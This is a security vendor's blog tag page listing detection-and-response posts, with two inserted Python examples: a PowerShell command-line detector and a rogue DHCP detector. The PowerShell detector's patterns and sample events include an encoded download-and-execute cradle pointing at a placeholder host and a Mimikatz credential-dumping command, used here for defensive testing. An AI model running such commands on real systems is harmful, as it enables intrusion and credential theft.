Posts tagged Detection and Response

4 min MDR

MDR Vendor Must-Haves, Part 5: Multiple Threat Detection Methodologies, Including Deep Attacker Behavior Analysis

The best Managed Detection and Response (MDR) providers use a combination of threat intelligence, User Behavior Analytics (UBA), Attacker Behavior Analytics (ABA), and human threat hunts to provide detection for threats and attackers.

3 min InsightIDR

What’s New in InsightIDR: Q1 2021 in Review

Back at the start of the year, we reflected on some of our 2020 InsightIDR product investments and took a look at what was ahead in 2021. As the first quarter of the year comes to a close, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR.

2 min Managed Detection and Response

MDR Vendor Must-Haves, Part 4: Ingestion of Authentication Data Across Local, Domain, and Cloud Sources

Almost every threat or breach involves attackers using legitimate credentials to cause harm.

4 min Detection and Response

InsightIDR’s Log Search: Recent Enhancements and Upcoming Investments

We recently (virtually) sat down with Mirela Smlatic, a Senior Product Manager for Detection and Response at Rapid7, to hear about enhancements and upcoming investments into InsightIDR’s Log Search capabilities.

2 min Managed Detection and Response

MDR Vendor Must-Haves, Part 3: Ingestion of Other Technology Investments

By the time you’re ready to invest in a Managed Detection and Response (MDR) service, you’ve likely already invested in a number of different security tools aimed at preventing threats and detecting breaches. MDR is a continued investment in this technology, not always a pure replacement.

3 min Managed Detection and Response

MDR Vendor Must-Haves, Part 2: Ingestion of Network Device Data

One area that can offer incredible benefits in a Managed Detection and Response provider is the ingestion of network device data.

4 min Detection and Response

Attack vs. Data: What You Need to Know About Threat Hunting

While the definition of threat hunting may be straightforward—proactively hunting for threats—the reality of implementing a threat-hunting program is a bit more complicated, as there are different threat-hunting methodologies to choose from.

5 min Managed Detection and Response

Rapid7 Recognized as a Strong Performer in the Inaugural Forrester Wave™ for MDR, Q1 2021

Rapid7 has been included among the top vendors in the inaugural Forrester Wave™: Managed Detection and Response, Q1 2021 and recognized as a Strong Performer.

3 min Managed Detection and Response

MDR Vendor Must-Haves, Part 1: Deep Observation of Real-Time Endpoint Data

Assessing Managed Detection and Response (MDR) vendors is no easy task. However, evaluating each based on predetermined tactical prescriptions for what a provider can offer your business can help ensure you are hiring the right fit for you and your team.

18 min Zero-day

Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange

In recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in Microsoft’s Exchange Server by an attacker referred to as HAFNIUM.

6 min SOAR

SOC Automation with InsightIDR and InsightConnect: Three Key Use Cases to Explore to Optimize Your Security Operations

It may not be a surprise that automating your security operations will augment your team’s skills and expertise to detect and respond to threats with super speed.

4 min Detection and Response

Top Security Trends Driving Threat Detection and Response Priorities Today

The threat landscape continues to grow at a rapid pace, and organizations need security solutions that can keep up.

1 min Detection and Response

InsightIDR’s NTA Capabilities Expanded to AWS

We’re excited to announce we have expanded the Network Traffic Analysis (NTA) capabilities in InsightIDR to support Amazon Web Services (AWS) environments.

2 min InsightIDR

How to Combat Alert Fatigue With Cloud-Based SIEM Tools

Fortunately, there’s a way to get the visibility your team needs and streamline alerts: leveraging a cloud-based SIEM.

2 min Cloud Infrastructure

Why More Teams are Shifting Security Analytics to the Cloud This Year

As the threat landscape continues to evolve in size and complexity, so does the security skills and resource gap, leaving organizations both understaffed and overwhelmed.

2 min InsightIDR

Monitor Google Cloud Platform (GCP) Data With InsightIDR

Today, more and more organizations are adopting multi-cloud or hybrid environments, creating increasingly dispersed security environments.

10 min Security Operations Center (SOC)

Talkin’ SMAC: Alert Labeling and Why It Matters

This blog post demonstrates some common pitfalls of alert labeling and offers a new framework for SOCs to use.

4 min Customer Perspective

Finding Results at the Intersection of Security and Engineering

In this blog, Chaim Mazal discusses the importance of collaborating with teams to build a comprehensive security culture within an organization.

6 min InsightIDR

InsightIDR: 2020 Highlights and What’s Ahead in 2021

As we kick off the New Year, we wanted to highlight some key InsightIDR product investments and take a look ahead at detection and response in 2021.

4 min InsightIDR

What’s New in InsightIDR: Q4 2020 in Review

As we near the end of 2020, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR from Q4 2020.

2 min InsightIDR

Rapid7’s InsightIDR Introduces Integration with Cybereason

As InsightIDR continues to help teams save time and drive more effective detection and response, we’re excited to announce that customers can now integrate with Cybereason.

4 min InsightIDR

Rapid7 Recognized as a Strong Performer Among Security Analytics Providers by Leading Industry Report

We are thrilled to share that Rapid7 has been recognized as a Strong Performer in The Forrester Wave™: Security Analytics Platforms, Q4 2020.

4 min Detection and Response

2021 Detection and Response Planning, Part 4: Planning for Success with a Cloud SIEM

In this post, we’ll explore how a cloud SIEM, like Rapid7 InsightIDR, may be more relevant and impactful than ever before.

5 min InsightIDR

Visualizing Network Traffic Data to Drive Action

In this blog, we cover the top five multi-groupby queries that can be used to visualize network sensor data with the Insight Network Sensor.

4 min Detection and Response

2021 Detection and Response Planning, Part 3: Why 2021 Is the Year for SOC Automation

In this third installment of our series around 2021 security planning, we’re focused on SOC automation.

3 min InsightIDR

Introducing Enhanced Endpoint Telemetry (EET) in InsightIDR

Rapid7 is excited to announce Enhanced Endpoint Telemetry (EET) in our SIEM, InsightIDR.

5 min Detection and Response

2021 Detection and Response Planning, Part 2: Driving SOC Efficiency With a Detections-First Approach to SIEM

In this installment of our security planning series, we’ll explore the importance of reliable detections to drive an efficient security program forward.

4 min InsightIDR

What’s New in InsightIDR: Q3 2020 in Review

This post offers a closer look at some of the recent updates and releases in InsightIDR from Q3 2020.

4 min InsightIDR

Easily Explore Your Log Data with a Single Query in InsightIDR

We are delighted to announce that Log Search now supports grouping by multiple fields in your log data.

6 min Detection and Response

Rapid7 Introduces “Active Response” for End-to-End Detection and Response

We are excited to announce the launch of our new Active Response capability as a part of our MDR Elite service.

6 min Detection and Response

2021 Detection and Response Planning, Part 1: Rapid7’s Jeffrey Gardner Breaks Down How CISOs Should Approach Security Planning for the New Year

To kick off this series, we sat down with Jeffrey Gardner, a former Information Security Officer, and recently appointed Practice Advisor for our Detection and Response portfolio here at Rapid7.

2 min InsightIDR

Define What to Parse From Logs with the Custom Parsing Tool in InsightIDR

In InsightIDR, Rapid7’s SIEM tool, customers use log data to detect malicious activity, prove compliance, and gain visibility across their network.

3 min Rapid7 Perspective

Why I Joined Rapid7

In this blog, Jeff Gardner, Rapid7's new Detection & Response Practice Advisor, discusses why he decided to join Rapid7.

3 min InsightIDR

InsightIDR Demo: Cloud-Native SIEM vs. Modern Security Challenges

Grab some popcorn and watch as Rapid7’s demo video gives you a glimpse of InsightIDR in action.

3 min SIEM

Data Ingestion and Data Digestion: What SIEM Log Consumption Tells Us About Modern Attack Patterns

From endpoints and VPN networks to cloud applications, the modern attack surface has expanded—but does your solution stack reflect this?

9 min Virtual Vegas

Virtual Black Hat: Rapid7 Experts Share Key Takeaways from Day 2 Sessions

Our Rapid7 experts attended another day of incredible talks, and have plenty of key takeaways and insights to share about their Virtual Vegas sessions.

9 min Virtual Vegas

Virtual Black Hat: Rapid7 Experts Share Key Takeaways from Day 1 Sessions

Even from home, it can be tough to catch what you want to see at Black Hat, so we had our experts do the work for you as part of our Virtual Vegas event.

3 min InsightIDR

InsightIDR Now Connects to Zoom for Easy Monitoring

Zoom adoption has skyrocketed with spikes in remote working, but web application security needs to be a top priority to avoid disruptions in collaboration.

4 min InsightIDR

What’s New in InsightIDR: H1 2020 in Review

This post offers a closer look at select highlights of what’s new in InsightIDR, our cloud-based SIEM tool, from the first half of 2020.

6 min InsightIDR

Defense in Depth Using Deception Technology in InsightIDR

Today, we are diving into the four pieces of deception technology that Rapid7 offers through our incident detection and response tool, InsightIDR.

5 min Network Traffic Analysis

Top 5 Ways to Get a Network Traffic Source on Your Network

In this blog, we take a look at the top five ways to get a network traffic source on your network.

3 min InsightIDR

Seeing Value From Day One: What You Need to Know About Cloud SIEM Deployment and Configuration

In a fast-paced environment, companies need security solutions that boost visibility and empower IT professionals to act confidently and decisively.

3 min SIEM

Rapid7 Named a 2020 Gartner Peer Insights Customers’ Choice for Security Information Event Management

Rapid7 is excited to announce that we have been recognized as a Gartner Peer Insights Customers’ Choice for Security Information Event Management (SIEM).

7 min Managed Detection and Response

Rapid7 Managed Detection and Response (MDR): The Service that Never Sleeps

In this post, we break down everything you need to know about Rapid7 Managed Detection and Response (MDR).

5 min Detection and Response

How Rapid7 Customers Are Using Network Traffic Analysis in Detection and Response

In this blog, we discuss how Rapid7 customers are using network traffic analysis in detection and response.

4 min SIEM

SIEM Security Tools: Six Expensive Misconceptions

Understanding recent improvements to traditional SIEMs incorporated by next-generation solutions proves critical to building a confident security posture.

6 min MDR

Maturing Your Security Posture: Around-the-Clock Threat Detection With Managed Detection & Response (MDR) Services

Recently, we sat down with Jeremiah Dewey, Rapid7’s VP of Managed Services, to chat about how MDR services strengthen traditional security products.

9 min Security Operations Center (SOC)

Moving Toward a Better Signature Metric in SOCs: Detection Efficacy

In this blog, we break down the "Detection Efficacy" metric within the Security Operations Center (SOC).

3 min Detection and Response

5 Challenges Outsourced Detection and Response Operations Can Help Solve

In this blog, we discuss five challenges that managed detection and response (MDR) operations can help solve.

3 min InsightIDR

How InsightIDR Is Accelerating Detection and Response in Modern Environments

According to The Total Economic Impact™ Of Rapid7 InsightIDR, customers experience increased visibility, decreased incident response time, and significant cost savings after switching to InsightIDR from their previous SIEM.

6 min Managed Detection and Response

Uncooking Eggs: Manual Dridex Dropper Malicious Document Deobfuscation Methods

Learn how to analyze an obfuscated malicious document with a focus on basic static analysis.

3 min SIEM

Analyze Security Data Faster with Visual Search in InsightIDR

Learn how InsightIDR, Rapid7’s SIEM tool, uses visualization to provide powerful security data analysis.

3 min Security Operations Center (SOC)

SOC Automation: Accelerate Threat Detection and Response with SIEM and SOAR

We believe that the best solution to industry-wide struggles with threat detection and response is to increase efficiency using SIEM and SOAR together.

7 min Managed Detection and Response

Top 3 Outcomes Organizations Try to Achieve in Their Incident Detection and Response Programs

In this blog, we break down the top three outcomes organizations try to achieve in their Detection and Response programs.

3 min InsightIDR

The Importance of Network Visibility With a Remote Workforce

As IT and network security staff around the world hurry to roll out more and more VPN and remote access services, it’s important to recognize that security or operational issues can arise.

4 min InsightIDR

3 Common Threats to Look for in Your Network Data

Today, we'll be highlighting three common threats to keep an eye out for in your network data and the best methods of remediation.

5 min Detection and Response

How to Define Business Value for Security Programs

Today, we're evaluating the categorization of Detection and Response program outcomes and Attack Surface Management outcomes uncovered by Rapid7's UX team.

3 min Security Operations Center (SOC)

Intro to the SOC Visibility Triad

In this blog, we break down the three pillars of the Security Operations Center (SOC) Visibility Triad.

8 min InsightIDR

How to Analyze Your Log Data Using the Log Search API in InsightIDR

In this blog, we discuss how to analyze your log data using InsightIDR's Log Search API.

3 min Detection and Response

InsightIDR: 2019 Year in Review

As we turn the corner into the new year, our team has been looking back at 2019 and reflecting on some of our most exciting updates from InsightIDR.

7 min InsightIDR

10 Threat Detection and Response Resolutions for 2020

From knowing what you have, who may want it, and how they can get it: these 10 IDR resolutions for 2020 are sure to keep you busy.

4 min InsightIDR

Be Audit You Can Be, Part 2: How to Parse Out Fields in Your Logs

In this blog, we take a look at how InsightIDR’s Custom Data Parsing tool can make quick work of parsing out those interesting fields in the logs.

10 min Detection and Response

Unlocking the Power of the InsightIDR Threat API, Part 2

In this post, we’ll demonstrate how to scrape a few sites for possible bad actors using InsightIDR.

7 min InsightIDR

Be Audit You Can Be, Part 1: How to Securely Send and Monitor Your Audit Logs with InsightIDR

In this blog, we discuss how to collect the audit trail from a device or application using InsightVM and InsightIDR.

3 min InsightConnect

Accelerating Incident Response with Threat Intelligence and Alert Enrichment

Rapid7 continues to invest in making automation more accessible for security professionals across the entire Insight Cloud product suite and our standalone SOAR solution, InsightConnect.

13 min InsightIDR

Import External Threat Intelligence with the InsightIDR Threats API

In this blog, we explain how to automate updating threat feeds in InsightIDR using the REST API.

5 min Incident Detection

The Fundamentals of Building a Threat Detection and Response Program

In this post, we’ll summarize some of the key takeaways for businesses looking to further their threat detection and response programs, as well as provide helpful resources that will help you along the way.

5 min Incident Detection

How Attackers Can Harvest Users’ Microsoft 365 Credentials with New Phishing Campaign

In this blog post, Rapid7's MDR services team outlines a unique phishing campaign that utilizes a novel method of scraping organizations’ branded Microsoft 365 tenant login pages to produce highly convincing credential harvesting pages.

8 min AWS

Automating the Cloud: AWS Security Done Efficiently

Today, we are going to be installing software on all your existing EC2 instances across several (or all!) accounts under an organization in AWS.

4 min Cloud Infrastructure

Cloud Security Primer: The Basics You Need to Know

What do you need to do to secure your cloud-based systems while enjoying the competitive benefits of the cloud? Read this blog to find out.

4 min InsightIDR

The Importance of Preventing and Detecting Malicious PowerShell Attacks

In this blog, we will discuss why organizations should care about malicious PowerShell activity, how attackers use PowerShell to steal credentials, and how to prevent and detect malicious PowerShell activity.
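As an added illustration of the detection side of that post (example code written for this page, not code from the post or from Rapid7's products): a small analyzer that takes process-creation command lines, confirms the image is a PowerShell host, decodes any `-EncodedCommand` argument in the abbreviated forms PowerShell accepts (`-e`, `-ec`, `-enc`, ...), and scores the raw and decoded text against indicators such as download cradles, hidden windows, execution-policy bypass and credential-theft tooling. The indicator regexes, the `HIGH_CONFIDENCE` set and the sample events (hostnames, paths and the `example.invalid` URL) are all constructed for the example.

```python
import base64
import ntpath
import re

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Behaviours that are rarely legitimate in a command line or the script it decodes to.
# Constructed for this example; tune them to the environment before relying on them.
INDICATORS = {
    "download_cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "execution_policy_bypass": re.compile(r"-e(?:x|p|xecutionpolicy)\s+bypass", re.I),
    "obfuscation": re.compile(r"FromBase64String|\[char\]|-join\b", re.I),
    "credential_theft": re.compile(r"Invoke-Mimikatz|sekurlsa|lsass|Get-Keystrokes|Invoke-Kerberoast", re.I),
}
HIGH_CONFIDENCE = {"download_cradle", "credential_theft", "undecodable_encoded_command"}


def tokenize(cmd: str):
    """Split a Windows command line into arguments, keeping quoted paths intact."""
    return re.findall(r'"[^"]*"|\S+', cmd)


def decode_encoded_command(tokens):
    """Locate an -EncodedCommand argument (-e, -ec, or any prefix of -EncodedCommand of two or
    more letters) and decode its UTF-16LE base64 payload.
    Returns (index_of_value, decoded_text); decoded_text is None when the value will not decode,
    and (None, None) when no such argument is present."""
    for i in range(len(tokens) - 1):
        tok = tokens[i]
        if not tok.startswith("-"):
            continue
        name = tok[1:].lower()
        if name not in ("e", "ec") and not (len(name) >= 2 and "encodedcommand".startswith(name)):
            continue
        value = tokens[i + 1].strip('"')
        try:
            return i + 1, base64.b64decode(value, validate=True).decode("utf-16-le")
        except ValueError:          # binascii.Error and UnicodeDecodeError both subclass ValueError
            return i + 1, None
    return None, None


def analyze_command_line(cmd: str):
    """Return None for non-PowerShell processes, otherwise the decoded script, the matched
    indicators and whether the event should alert."""
    tokens = tokenize(cmd)
    if not tokens:
        return None
    exe = ntpath.basename(tokens[0].strip('"')).lower()
    if exe not in POWERSHELL_HOSTS:
        return None
    idx, decoded = decode_encoded_command(tokens)
    indicators = set()
    scan = tokens
    if idx is not None:
        indicators.add("encoded_command")
        scan = tokens[:idx] + tokens[idx + 1:]   # drop the base64 blob so it cannot produce false matches
        if decoded is None:
            indicators.add("undecodable_encoded_command")
    text = " ".join(scan) + ("\n" + decoded if decoded else "")
    indicators.update(name for name, rx in INDICATORS.items() if rx.search(text))
    return {
        "exe": exe,
        "decoded": decoded,
        "indicators": sorted(indicators),
        "alert": bool(indicators & HIGH_CONFIDENCE) or len(indicators) >= 2,
    }


def scan_process_events(events):
    """events: iterable of (host, command_line) pairs as a process-creation log supplies them.
    Returns [(host, indicators)] for the events that should alert."""
    alerts = []
    for host, cmd in events:
        result = analyze_command_line(cmd)
        if result and result["alert"]:
            alerts.append((host, result["indicators"]))
    return alerts


def _b64_utf16(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (used only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events, loosely modelled on Windows 4688 / Sysmon event 1 command-line fields.
SAMPLE_EVENTS = [
    ("ws01", r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1'),
    ("ws02", "powershell.exe -NoP -NonI -W Hidden -Enc "
             + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")),
    ("ws03", 'powershell.exe -ep bypass -c "Invoke-Mimikatz -Command privilege::debug sekurlsa::logonpasswords"'),
    ("ws04", "cmd.exe /c whoami"),
]

if __name__ == "__main__":
    for host, indicators in scan_process_events(SAMPLE_EVENTS):
        print(host, indicators)
```

The base64 value is removed before the regexes run so that a random blob cannot match `IEX` by accident, and an encoded command that fails to decode is itself treated as high confidence: a legitimate scheduled task does not ship a payload the analyst cannot read.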

5 min InsightIDR

How to Monitor Your AWS S3 Activity with InsightIDR

In this blog, we discuss AWS S3 buckets and how Rapid7's InsightIDR can help you monitor important activity.

3 min Cloud Infrastructure

Why the Modern SIEM Is in the Cloud

Let’s talk about why modern SIEM is in the cloud, what core benefits you can expect, and how it is predicted to evolve as we soar toward 2020.

2 min Research

[Research] Under the Hoodie, 2019 Edition: Lessons Learned from 180 Penetration Tests

Our 2019 Under the Hoodie report covers the measurable results of about 180 penetration tests conducted by Rapid7. Find out what we learned.

4 min Cloud Infrastructure

Your Guide to Securing Multi-Cloud Environments in an IaaS World

In this post, we’ll cover the unique challenges with securing cloud environments, and some best practices specifically focused on securing multi-cloud infrastructure.

4 min InsightIDR

Securing Your Cloud Environments with InsightIDR, Part 2: Amazon Web Services (AWS)

In this blog, we will talk about threat detection for the world’s most popular cloud host, Amazon Web Services (AWS).

3 min InsightIDR

Announcing CyberArk and InsightIDR Integration: Connect CyberArk with InsightIDR to Visualize and Investigate Your Privileged Access

To help companies monitor user behavior, secure privileged access, and identify attacks on passwords, we are teaming up with CyberArk.

3 min Threat Intel

Rapid7 Threat Report Meets MITRE ATT&CK: What We Saw in 2019 Q1

The Q1 edition of our Quarterly Threat Report is unique because all investigated incidents have been mapped to the MITRE ATT&CK framework.

4 min InsightIDR

Why Deploying a SIEM Tool Doesn't Need to Be Complicated: A Pirate Story

Ahoy! In this Blackbeard-inspired blog, we will tell ye’ a tale of navigating your SS SIEM, InsightIDR, through the unpredictable waters of cybersecurity to reach Remediation Island.

2 min Research

Rapid7 Quarterly Threat Report: 2019 Q1

In our recent Quarterly Threat Report, we look at commonly targeted industries, the use of remote entry, and the most common phishing sites by industry.

3 min InsightIDR

Your Pocket Guide for Cloud SIEM Evaluation

In this post, we’ll quickly review five critical questions to help kick-start your cloud SIEM evaluation.

2 min Incident Response

4 Key Lessons from the Citycomp Data Breach

On April 30, 2019 Motherboard reported on a combined data breach and extortion attempt against Citycomp, a network and internet infrastructure firm based in Germany.

5 min InsightIDR

Capture the Flag: Red Team vs. Cloud SIEM

Here's how InsightIDR fared in a recent Capture the Flag (CTF) meetup with a special blue-team element.

3 min Rapid7 Perspective

How to Start a Career in Cybersecurity: From Stay-at-Home Mom to Security Pro-in-Training

My name is Carlota Bindner, and here is my story on how I went from being a stay-at-home mom and community volunteer to participating in Rapid7's Security Consultant Development Program.

4 min Incident Detection

Q4 Threat Report: Analyzing the Top 3 Advanced Threats and Detection Techniques

In this post, we’ll review three major findings based on data from Project Sonar, Project Heisenberg, and our Managed Detection and Response customer base, which leverages our security experts and InsightIDR to unify security data and identify compromises in real-time.

4 min InsightIDR

Forrester Tech Tide for Detection and Response: Is 2019 the Year of Convergence?

Rapid7 was recently recognized for capabilities spanning security user behavior analytics, security analytics, deception technology, SOAR, and file integrity monitoring.

3 min InsightIDR

Utilize File Integrity Monitoring to Address Critical Compliance Needs

To help organizations address their compliance auditing needs, we are excited to introduce file integrity monitoring (FIM) for InsightIDR.

2 min Research

Rapid7 Quarterly Threat Report: Q4 and 2018 Wrap-Up

In our 2018 Q4 Threat Report, we look at our custom Attacker Behavior Analytics rules, examine some new threats we’ve seen this year, and provide some steps to help you secure your organization.

3 min Incident Detection

How to Alert on Rogue DHCP Servers

Learn how to alert on rogue DHCP servers using network traffic as a data source. We look at how you can use Wireshark or LANGuardian to detect DHCP servers.
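As an added illustration of the approach that post describes (example code written for this page, not code from the post, from Wireshark or from LANGuardian): parse the option area of captured BOOTP/DHCP messages, take the server identifier (option 54) from every OFFER and ACK, and flag any server that is not on an allowlist. The allowlist, the `build_dhcp` packet builder and the four sample messages are constructed for the example; on a live network the payloads would come from UDP port 67/68 traffic in a capture.

```python
from ipaddress import IPv4Address

# Sanctioned DHCP servers (assumption for the example; in practice, your DHCP inventory).
AUTHORIZED_DHCP_SERVERS = {"10.0.0.1"}

DHCP_MAGIC = b"\x63\x82\x53\x63"   # magic cookie that ends the BOOTP header (RFC 2131)
OFFER, ACK = 2, 5                  # DHCP message types (option 53) that only a server sends


def parse_dhcp_options(payload: bytes) -> dict:
    """Parse the TLV option area of a DHCP message (RFC 2132) into {code: raw_value}.
    Handles the single-byte pad (0) and end (255) options and rejects truncated data."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == 0:          # pad
            i += 1
            continue
        if code == 255:        # end of options
            break
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def dhcp_server_offers(payload: bytes):
    """Return (message_type, server_ip) for server-originated OFFER/ACK messages,
    or None for client messages and messages without a server identifier."""
    opts = parse_dhcp_options(payload)
    mtype = opts.get(53)
    if mtype is None or mtype[0] not in (OFFER, ACK):
        return None
    sid = opts.get(54)
    if sid is None or len(sid) != 4:
        return None
    return mtype[0], str(IPv4Address(sid))


def rogue_dhcp_servers(packets):
    """Given DHCP payloads seen on the wire, return the set of server IPs that handed out
    OFFER/ACK but are not in the allowlist."""
    rogue = set()
    for p in packets:
        found = dhcp_server_offers(p)
        if found and found[1] not in AUTHORIZED_DHCP_SERVERS:
            rogue.add(found[1])
    return rogue


def build_dhcp(msg_type: int, server_ip: str, yiaddr: str = "10.0.0.50") -> bytes:
    """Build a minimal DHCP message. Constructed test input, not a real capture."""
    hdr = bytearray(236)
    hdr[0] = 2 if msg_type in (OFFER, ACK) else 1    # op: BOOTREPLY or BOOTREQUEST
    hdr[1], hdr[2] = 1, 6                            # htype Ethernet, hlen 6
    hdr[4:8] = b"\xde\xad\xbe\xef"                   # xid
    hdr[16:20] = IPv4Address(yiaddr).packed          # yiaddr: address being offered
    opts = bytes([53, 1, msg_type, 54, 4]) + IPv4Address(server_ip).packed + bytes([255])
    return bytes(hdr) + DHCP_MAGIC + opts


# Constructed sample traffic: the real server, a client DISCOVER, and an unauthorised box answering.
SAMPLE_PACKETS = [
    build_dhcp(OFFER, "10.0.0.1"),
    build_dhcp(1, "10.0.0.1"),        # DHCPDISCOVER from a client; ignored by the detector
    build_dhcp(OFFER, "10.0.0.77"),
    build_dhcp(ACK, "10.0.0.77"),
]

if __name__ == "__main__":
    print(rogue_dhcp_servers(SAMPLE_PACKETS))
```

Keying the alert on option 54 rather than on the IP header matters because a relay agent can forward a legitimate server's reply from its own address; the server identifier is what the client will actually bind to.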

4 min SIEM

SOC, SIEM, or MDR? How to Choose the Right Options for Your Infosec Program

Choosing between building an in-house SOC, utilizing a SIEM, or outsourcing to an MDR provider? Learn from three peers on how they made their decision.

3 min Breach Response News

PHP Extension and Application Repository (PEAR) Compromise: What You Need to Know

According to the PHP Extension and Application Repository (PEAR), a security breach had been found on the `` web server.

7 min Incident Response

Windows Event Forwarding: The Best Thing You’ve Never Heard Of

This blog post will discuss how to get logs into your SIEM and create custom alerts to detect certain behaviors in those logs.

6 min Research

Q3 Threat Report: Analyzing Three Key Detection Trends

In this post, we will review findings from our 2018 Q3 Threat Report, including common attack types, the Emotet malware, and protocol poisoning.

4 min Research

How Your Organization Can Respond After News of a Major Security Breach

When data breaches occur, there are proactive actions organizations can take to double-check their current-state security posture, practices, and protocols.

7 min Log Search

Rolling with Your Logs, Part 3: Using Regex to Expand Your Search Options

In this final installment of our Log Search series, we’ll look at some simple regular expressions that will greatly expand your Log Search options.

3 min Incident Detection

5 Tips For Monitoring Network Traffic on Your Network

Monitoring traffic on your network is important if you want to keep it secure. These five tips will help you get the most out of your network traffic analysis (NTA) tool.

6 min User Behavior Analytics

[Q&A] Why Every Threat Detection Strategy Needs User Behavior Analytics

VP of Product Sam Adams explains how UBA works and how it’s evolved over the years to become a core part of threat detection and response strategies.

6 min Log Search

Rolling with Your Logs, Part 2: Advanced Mode Searches

In Part 2 of this three-part series on InsightIDR Log Search, we cover three concepts: parsed logs, the groupby function, and log search operations.

2 min Research

Rapid7 Quarterly Threat Report: 2018 Q3

The leaves are falling and it’s getting colder, which means it’s time for our newest Quarterly Threat Report.

5 min Log Search

Rolling with Your Logs, Part 1: Your Guide to Log Search in InsightIDR

In the first installment of this series, we'll cover the three most important basics of log search, then run through a few common Simple Mode searches.

4 min Incident Response

A Day in the Life of a Rapid7 SOC Analyst

Today, we are diving into a day in the life of a Rapid7 security operations center (SOC) analyst, specifically around threat detection and response.

3 min Critical Infrastructure

National Cybersecurity Awareness Month: Incident Response in the Industrial Industry

In the critical infrastructure sector, one common challenge is the integration between kinetic emergency operations and cybersecurity incident response. Use these tactics to integrate these teams more naturally.

3 min Incident Detection

Rapid7 Leads All 'Strong Performers' in 2018 Forrester Wave for Emerging MSSPs

We’re proud to be recognized in the Forrester Wave as the leader in the “Strong Performer” category and to have the second-highest overall score for current offering for our Managed Security Services.

1 min Incident Response

Rapid7 Named a Leader in IDC MarketScape for Incident Response Services

We are excited to announce that Rapid7 has been named a Leader in incident response services by the International Data Corporation (IDC).

2 min InsightIDR

Universal Event Formats Q&A: Apply User Behavior Analytics to More of Your Data

Rapid7 is proud to announce a new way to collect log data: Universal Event Formats. Here is a quick Q&A to give you the lowdown.

2 min Incident Response

Customer Panel Recap: Building a Modern Security Program

I recently had the chance to sit down with two Rapid7 customers to hear how they’ve approached building out their security programs and some of the obstacles they’ve encountered in the process.

4 min InsightVM

Automate to Accelerate: Introducing Security Orchestration and Automation on the Rapid7 Insight Platform

Rapid7 is proud to officially announce orchestration and automation on our Insight platform, with automation taking shape in a number of existing products and our new SOAR offering, Rapid7 InsightConnect.

3 min InsightIDR

Detecting Inbound RDP Activity From External Clients

Today, we discuss how to detect inbound RDP activity from external clients.

4 min Automation and Orchestration

Accelerate Incident Response with Security Orchestration and Automation

Security orchestration and automation can be a saving grace in security for many resource-strapped or highly targeted companies.

5 min Incident Detection

How Our Threat Intel Team Crafts Attacker Behavior Analytics

Threat Intel Lead Rebekah Brown discusses how the teams at Rapid7 create Attacker Behavior Analytics, and how that intel is infused into our solutions.

2 min Research

Rapid7 Quarterly Threat Report: 2018 Q2

Our latest Quarterly Threat Report is out, and 2018 has been keeping network defenders on their toes as malicious actors continue to find new ways to compromise networks alongside their tried-and-true types of cyber-attacks.

4 min Incident Response

CIS Critical Security Control 19: Steps for Crafting an Efficient Incident Response and Management Strategy

An effective incident response plan helps you quickly discover attacks, contain the damage, eradicate the attacker's presence, and restore the integrity of your network and systems.

3 min Incident Detection

Detection Reflection: Analyzing 9 Months of Rapid7 Penetration Testing Engagements

In this post, we’ll review results and trends from Under the Hoodie 2018 as they relate to incident detection, including where our red team found success.

5 min Threat Intel

Q&A with Rebekah Brown, Rapid7 Threat Intel Lead, on Attacker Behavior Analytics

Hear from Rebekah Brown, Rapid7’s threat intel lead, on Attacker Behavior Analytics and how Rapid7 is developing next gen threat detections for customers.

2 min Incident Detection

MAC Address Tracker: Generating a Network Inventory Database Using Network Traffic Analysis

Learn how to generate a network inventory database of all MAC addresses in your environment by monitoring your network traffic.

2 min Incident Detection

The Rapid7 Belfast Security Operations Centre: Take a Video Tour

Get a behind the scenes look at the managed detection and response (MDR) team in the Rapid7 Belfast SOC. Watch now.

4 min InsightIDR

A Behind the Scenes Look at Attacker Behavior Analytics with our MDR Team

Just a handful of years ago, drive-by exploit kits were how attackers attempted to attack companies and individuals. Today, it’s through the delivery of malicious documents and malware that can quickly contort and disguise where it’s coming from. Attack vectors are constantly evolving—here within our managed detection and response (MDR) team at Rapid7, it’s our job to stay several steps ah

3 min Automation and Orchestration

Do You Need Coding Resources on Your Security Team?

Often when security teams think about security automation [/2017/05/18/security-automation/], they worry they don’t have the coding capabilities needed to create, implement, and maintain it. Pulling development resources from the IT team or engineering department can take time; backlogs are long, and revenue-generating projects tend to take priority. Another option is to hire an IT consultant, but this can be pricey and may not be sustainable long-term. Instead, some security teams try to find

3 min InsightIDR

Deception Technology in InsightIDR: Setting Up Honeypots

In order to overcome the adversary, we must first seek to understand. By understanding how attackers operate, and what today’s modern network looks like from an attacker’s perspective, it’s possible to deceive an attacker, or at least have warning around internal network compromise. Today, let’s touch on a classic deception technology that continues to evolve: the honeypot. Honeypots are decoy systems, deployed alongside production system

3 min User Behavior Analytics

Deception Technology in InsightIDR: Setting Up Honey Users

Having the ability to detect and respond to user authentication attempts is a key feature of InsightIDR, Rapid7’s threat detection and incident response solution. Users can take this ability one step further by deploying deception technology, like honey users, which come built into the product. A honey user i

5 min Breach Preparedness

Phishing Attacks Duping Your Users? Here’s a Better Anti-Phishing Strategy.

